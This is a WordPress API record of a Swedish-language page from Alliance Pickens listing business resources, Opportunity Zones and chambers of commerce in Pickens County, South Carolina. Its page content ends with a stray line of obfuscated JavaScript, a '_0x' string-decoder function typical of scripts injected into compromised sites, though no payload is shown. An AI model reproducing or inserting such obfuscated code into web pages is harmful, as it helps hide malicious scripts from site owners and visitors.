{"id":6327,"date":"2020-10-28T14:30:17","date_gmt":"2020-10-28T14:30:17","guid":{"rendered":"http:\/\/alliancepickens.com\/resurser-tillgangliga\/"},"modified":"2020-12-04T20:14:09","modified_gmt":"2020-12-04T20:14:09","slug":"resurser-tillgangliga","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/sv\/resurser-tillgangliga\/","title":{"rendered":"Resurser tillg\u00e4ngliga"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;pickens_county_resources&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_empty_space height=&#8221;30px&#8221;][vc_single_image image=&#8221;5111&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;http:\/\/alliancepickens.com\/resources-avilable\/data-center-population\/&#8221;][vc_empty_space height=&#8221;30px&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;I det h\u00e4r avsnittet&#8221; nav_menu=&#8221;23&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;pcr&#8221;][vc_column][vc_column_text]<\/p>\n<h2>Pickens County Resurser<\/h2>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignright size-full wp-image-10717\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg\" alt=\"\" width=\"303\" height=\"357\" srcset=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg 303w, https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge-255x300.jpg 255w\" sizes=\"auto, (max-width: 303px) 100vw, 303px\" \/>P\u00e5 Alliance Pickens \u00e4r v\u00e5rt m\u00e5l att ge medlemmar av den befintliga industrin, liksom de f\u00f6retag som kan vara intresserade av att l\u00e4ra sig mer om Pickens County, med den information de beh\u00f6ver f\u00f6r att fatta v\u00e4lgrundade aff\u00e4rsbeslut. Om v\u00e5rt kontor kan vara till hj\u00e4lp med ditt f\u00f6retags expansion eller flytt till Pickens County.South Carolina.USA, v\u00e4nligen <a href=\"http:\/\/alliancepickens.hosted.civiclive.com\/cms\/One.aspx?portalId=10351&amp;pageId=13653\">kontakta v\u00e5rt kontor.<\/a><\/p>\n<p>Den ekonomiska utvecklingsalliansen av Pickens l\u00e4n (Allians Pickens) bemyndigas av, och fungerar n\u00e4ra med, regeringen av Pickens l\u00e4n. F\u00f6retag kan f\u00f6rhandla med Pickens County f\u00f6r incitament, och alla skatterelaterade riktlinjer tillhandah\u00e5lls av Pickens County eller delstaten South Carolina.<\/p>\n<p><span style=\"font-weight: 400\">Pickens County Regeringen \u00e4r dedikerade till att tillhandah\u00e5lla tid, effektiva, artiga och professionella tj\u00e4nster till alla medborgare i Pickens County. Pickens County fattar beslut som fr\u00e4mjar det st\u00f6rre samh\u00e4llets b\u00e4sta och utvecklar resurser, riktlinjer, planer och f\u00f6rfaranden f\u00f6r att effektivt tillgodose allm\u00e4nhetens behov. County regeringstj\u00e4nstem\u00e4n driva och st\u00f6dja de program och projekt som b\u00e4st uppr\u00e4tth\u00e5lla prioriteringarna i Pickens County Council.<\/span><\/p>\n<p><a class=\"greenbtn\" href=\"https:\/\/www.co.pickens.sc.us\" target=\"_blank\" rel=\"noopener noreferrer\">L\u00e4ra sig mer<\/a>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_class=&#8221;er&#8221; el_id=&#8221;entrepreneurial_resources&#8221;][vc_column][vc_column_text el_id=&#8221;er&#8221;]<\/p>\n<h2>Entrepren\u00f6riella resurser<\/h2>\n<p>Tack vare pro-business milj\u00f6 Pickens County.South Carolina.USA, sm\u00e5f\u00f6retagare kan frodas. Federala, statliga och lokala resurser finns tillg\u00e4ngliga f\u00f6r att st\u00f6dja sm\u00e5f\u00f6retagares insatser oavsett om du precis har startat ditt f\u00f6retag eller arbetar p\u00e5 en plan som hj\u00e4lper den att v\u00e4xa.[\/vc_column_text][vc_empty_space][vc_row_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6340\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/logo-sbdc.png\" alt=\"\" width=\"174\" height=\"66\"> <a href=\"https:\/\/www.scsbdc.com\/\" target=\"_blank\" rel=\"noopener noreferrer\">L\u00e4ra sig mer<\/a><\/p>\n<p>Enligt ett samarbetsavtal med US Small Business Administration Small Business Center (SC SBDC) programmet inr\u00e4ttades f\u00f6r att hj\u00e4lpa sm\u00e5f\u00f6retag nystartade f\u00f6retag och f\u00f6r att bist\u00e5 i den fortsatta tillv\u00e4xten av sm\u00e5f\u00f6retag \u00f6ver hela landet. Programmet st\u00f6ds med federala, statliga och privata medel och \u00e4r \u00f6ppen f\u00f6r alla nuvarande eller blivande sm\u00e5f\u00f6retagare i allm\u00e4nhet avgiftsfritt.[\/vc_column_text][vc_empty_space][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6354\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/logo-scdoc.png\" alt=\"\" width=\"193\" height=\"57\"> <a href=\"https:\/\/www.sccommerce.com\/\" target=\"_blank\" rel=\"noopener noreferrer\">L\u00e4ra sig mer<\/a><\/p>\n<p>SC Department of Commerce erbjuder en m\u00e4ngd eller resurser f\u00f6r sm\u00e5 f\u00f6retag ing\u00e5r deras Business Resource Guide.[\/vc_column_text][vc_empty_space][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6365\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/logo-scbos.png\" alt=\"\" width=\"149\" height=\"50\"> <a href=\"https:\/\/scbos.sc.gov\/\">L\u00e4ra sig mer<\/a><\/p>\n<p>South Carolina Business One Stop eller SCBOS \u00e4r den officiella South Carolina business webbportal.[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6386\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/logo-smbcc.png\" alt=\"\" width=\"167\" height=\"61\"> <a href=\"http:\/\/osmba.sc.gov\/\" target=\"_blank\" rel=\"noopener noreferrer\">L\u00e4ra sig mer<\/a><\/p>\n<p>M\u00e5len f\u00f6r Office of Small and Minority Business Assistance (OSMBA) \u00e4r att fr\u00e4mja tillv\u00e4xten och utvecklingen av sm\u00e5 och minoritets\u00e4gda f\u00f6retag i South Carolina och att f\u00f6respr\u00e5ka att en r\u00e4ttvis del av statliga upphandlingskontrakt tilldelas sm\u00e5 och minoritets\u00e4gda f\u00f6retag.[\/vc_column_text][vc_empty_space][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6404\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/logo-sba.png\" alt=\"\" width=\"97\" height=\"103\"> <a href=\"https:\/\/www.sba.gov\/\" target=\"_blank\" rel=\"noopener noreferrer\">L\u00e4ra sig mer<\/a><\/p>\n<p>Den amerikanska Small Business Administration (SBA) skapades 1953 som en oberoende byr\u00e5 f\u00f6r den federala regeringen att hj\u00e4lpa, r\u00e5d, bist\u00e5 och skydda intressen sm\u00e5f\u00f6retag oro, att bevara fri konkurrenskraftig f\u00f6retagsamhet och att uppr\u00e4tth\u00e5lla och st\u00e4rka den totala ekonomin i v\u00e5r nation.[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;4767&#8243;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row el_id=&#8221;opportunity_zones&#8221;][vc_column][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_column_text]<a href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/Opportunity-Zones-Flyer-Pickens-SC.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-5117\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/opportunityv2.jpg\" alt=\"\" width=\"482\" height=\"423\" srcset=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/opportunityv2.jpg 482w, https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/opportunityv2-300x263.jpg 300w\" sizes=\"auto, (max-width: 482px) 100vw, 482px\" \/><\/a><\/p>\n<p><a class=\"downloads\" href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/Opportunity-Zones-Flyer-Pickens-SC.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Ladda ner nu<\/a>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h2>Aff\u00e4rsm\u00f6jlighetszoner<\/h2>\n<p>[\/vc_column_text][vc_column_text]Opportunity Zone incitament \u00e4r ett samh\u00e4llsutvecklingsprogram som syftar till att uppmuntra l\u00e5ngsiktiga privata investeringar i l\u00e5ginkomstsamh\u00e4llen. Detta program ger ett federalt skatteincitament f\u00f6r skattebetalare som \u00e5terinvestera orealiserade kapitalvinster i &#8220;Opportunity Fonder&#8221;, som \u00e4r specialiserade fordon som \u00e4r dedikerade till att investera i omr\u00e5den som betecknas som &#8220;Opportunity Zone.&#8221; I Pickens County har tre (3) folkr\u00e4kningsskrifter valts ut som Opportunity Zone.<\/p>\n<p>F\u00f6r ytterligare information, ladda ner Pickens County <a href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/Opportunity-Zones-Flyer-Pickens-SC.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><br \/>\n  <strong>Opportunity Zone Flyer<\/strong><br \/>\n<\/a><strong>.<\/strong><\/p>\n<p>F\u00f6r att hitta lokala tillg\u00e4ngliga kontors- och industrifastigheter som ligger inom Opportunity Zone, bes\u00f6k <a href=\"http:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/\">v\u00e5ra sidor Webbplatser &amp; Byggnader<\/a> och leta efter ikonen &#8220;Opportunity Zone&#8221;.[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row el_id=&#8221;chambers&#8221;][vc_column][vc_column_text]<\/p>\n<h2 style=\"text-align: center\">Handelskammare<\/h2>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;10363&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; img_link_target=&#8221;_blank&#8221; link=&#8221;https:\/\/www.clemsonareachamber.org\/&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center\"><a href=\"https:\/\/www.clemsonareachamber.org\/\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Clemson-omr\u00e5det<\/strong><br \/>\nHandelskammaren<\/a><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;10356&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; img_link_target=&#8221;_blank&#8221; link=&#8221;https:\/\/www.easleychamber.org\/&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center\"><a href=\"https:\/\/www.easleychamber.org\/\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>St\u00f6rre Easley<\/strong><br \/>\nHandelskammaren<\/a><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;10349&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; img_link_target=&#8221;_blank&#8221; link=&#8221;https:\/\/www.explorepickens.com\/&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center\"><a href=\"https:\/\/www.explorepickens.com\/%22\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>St\u00f6rre Pickens<\/strong><br \/>\nHandelskammaren<\/a><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;10342&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; img_link_target=&#8221;_blank&#8221; link=&#8221;https:\/\/libertyareachamber.org\/&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center\"><a href=\"https:\/\/libertyareachamber.org\/\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Liberty-omr\u00e5det<\/strong><br \/>\nHandelskammaren<\/a><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">L\u00e4s mer om tillg\u00e4ngliga resurser<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;23&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Redo att s\u00e4tta ig\u00e5ng?<\/h1>\n<h3>Vi ser fram emot att f\u00e5 tala med er!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Kontakta v\u00e5rt team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;pickens_county_resources&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_empty_space height=&#8221;30px&#8221;][vc_single_image image=&#8221;5111&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;http:\/\/alliancepickens.com\/resources-avilable\/data-center-population\/&#8221;][vc_empty_space height=&#8221;30px&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;I det h\u00e4r avsnittet&#8221; nav_menu=&#8221;23&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;pcr&#8221;][vc_column][vc_column_text] Pickens County Resurser [\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text]P\u00e5 Alliance Pickens \u00e4r v\u00e5rt m\u00e5l att ge medlemmar av den befintliga industrin, liksom de f\u00f6retag som kan vara intresserade av att l\u00e4ra sig mer om Pickens County, med den information de beh\u00f6ver f\u00f6r&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-6327","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Resurser tillg\u00e4ngliga - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/sv\/resurser-tillgangliga\/\" \/>\n<meta property=\"og:locale\" content=\"sv_SE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Resurser tillg\u00e4ngliga - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;pickens_county_resources&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_empty_space height=&#8221;30px&#8221;][vc_single_image image=&#8221;5111&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;http:\/\/alliancepickens.com\/resources-avilable\/data-center-population\/&#8221;][vc_empty_space height=&#8221;30px&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;I det h\u00e4r avsnittet&#8221; nav_menu=&#8221;23&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;pcr&#8221;][vc_column][vc_column_text] Pickens County Resurser [\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text]P\u00e5 Alliance Pickens \u00e4r v\u00e5rt m\u00e5l att ge medlemmar av den befintliga industrin, liksom de f\u00f6retag som kan vara intresserade av att l\u00e4ra sig mer om Pickens County, med den information de beh\u00f6ver f\u00f6r&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/sv\/resurser-tillgangliga\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T20:14:09+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/resurser-tillgangliga\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/resurser-tillgangliga\\\/\",\"name\":\"Resurser tillg\u00e4ngliga - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/resurser-tillgangliga\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/resurser-tillgangliga\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/11\\\/pickenscoutybadge.jpg\",\"datePublished\":\"2020-10-28T14:30:17+00:00\",\"dateModified\":\"2020-12-04T20:14:09+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/resurser-tillgangliga\\\/#breadcrumb\"},\"inLanguage\":\"sv-SE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/resurser-tillgangliga\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"sv-SE\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/resurser-tillgangliga\\\/#primaryimage\",\"url\":\"http:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/11\\\/pickenscoutybadge.jpg\",\"contentUrl\":\"http:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/11\\\/pickenscoutybadge.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/resurser-tillgangliga\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Resurser tillg\u00e4ngliga\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"sv-SE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Resurser tillg\u00e4ngliga - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/sv\/resurser-tillgangliga\/","og_locale":"sv_SE","og_type":"article","og_title":"Resurser tillg\u00e4ngliga - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;pickens_county_resources&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_empty_space height=&#8221;30px&#8221;][vc_single_image image=&#8221;5111&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;http:\/\/alliancepickens.com\/resources-avilable\/data-center-population\/&#8221;][vc_empty_space height=&#8221;30px&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;I det h\u00e4r avsnittet&#8221; nav_menu=&#8221;23&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;pcr&#8221;][vc_column][vc_column_text] Pickens County Resurser [\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text]P\u00e5 Alliance Pickens \u00e4r v\u00e5rt m\u00e5l att ge medlemmar av den befintliga industrin, liksom de f\u00f6retag som kan vara intresserade av att l\u00e4ra sig mer om Pickens County, med den information de beh\u00f6ver f\u00f6r&hellip;","og_url":"https:\/\/alliancepickens.com\/sv\/resurser-tillgangliga\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T20:14:09+00:00","og_image":[{"url":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg","type":"","width":"","height":""}],"twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/sv\/resurser-tillgangliga\/","url":"https:\/\/alliancepickens.com\/sv\/resurser-tillgangliga\/","name":"Resurser tillg\u00e4ngliga - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/sv\/#website"},"primaryImageOfPage":{"@id":"https:\/\/alliancepickens.com\/sv\/resurser-tillgangliga\/#primaryimage"},"image":{"@id":"https:\/\/alliancepickens.com\/sv\/resurser-tillgangliga\/#primaryimage"},"thumbnailUrl":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg","datePublished":"2020-10-28T14:30:17+00:00","dateModified":"2020-12-04T20:14:09+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/sv\/resurser-tillgangliga\/#breadcrumb"},"inLanguage":"sv-SE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/sv\/resurser-tillgangliga\/"]}]},{"@type":"ImageObject","inLanguage":"sv-SE","@id":"https:\/\/alliancepickens.com\/sv\/resurser-tillgangliga\/#primaryimage","url":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg","contentUrl":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/sv\/resurser-tillgangliga\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/sv\/"},{"@type":"ListItem","position":2,"name":"Resurser tillg\u00e4ngliga"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/sv\/#website","url":"https:\/\/alliancepickens.com\/sv\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/sv\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"sv-SE"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/6327","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/comments?post=6327"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/6327\/revisions"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/media?parent=6327"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}